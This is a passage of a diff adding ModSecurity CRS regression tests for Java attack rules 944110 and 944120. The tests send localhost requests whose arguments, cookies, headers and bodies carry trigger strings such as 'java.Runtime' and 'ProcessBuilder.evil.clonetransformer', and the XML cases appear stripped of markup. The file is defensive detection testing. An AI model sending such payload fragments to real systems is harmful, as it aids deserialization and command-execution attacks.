"ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + version: HTTP/1.0 + data: "test=java.Runtime" + output: + log_contains: "id \"944110\"" + - test_title: 944110-2 + desc: Argument test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=java.ProcessBuilder" + output: + log_contains: "id \"944110\"" + - test_title: 944110-3 + desc: Argument name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.Runtime=test" + output: + log_contains: "id \"944110\"" + - test_title: 944110-4 + desc: Argument name includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.ProcessBuilder=test" + output: + log_contains: "id \"944110\"" + - test_title: 944110-5 + desc: Cookie test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-6 + desc: Cookie test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-7 + desc: Cookie name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.Runtime=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-8 + desc: Cookie name includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.ProcessBuilder=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-9 + desc: Request header test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-10 + desc: Request header test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-11 + desc: XML element includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-12 + desc: XML attribute name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-13 + desc: XML attribute value includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-14 + desc: XML element value includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.Runtime" + output: + log_contains: "id \"944110\"" + - test_title: 944110-15 + desc: XML element includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-16 + desc: XML attribute name includes keyworda java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-17 + desc: XML attribute value includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-18 + desc: XML element value includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.ProcessBuilder" + output: + log_contains: "id \"944110\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml new file mode 100644 index 000000000..509fe1e9e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml @@ -0,0 +1,2943 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944120.yaml" + description: "Positive tests for rule 944120" +tests: + - test_title: 944120-0 + desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-1 + desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-2 + desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-3 + desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-4 + desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-5 + desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-6 + desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-7 + desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-8 + desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-9 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-10 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-11 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-12 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-13 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-14 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-15 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-16 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-17 + desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-18 + desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-19 + desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-20 + desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-21 + desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-22 + desc: "XML element includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-23 + desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-24 + desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-25 + desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-26 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id 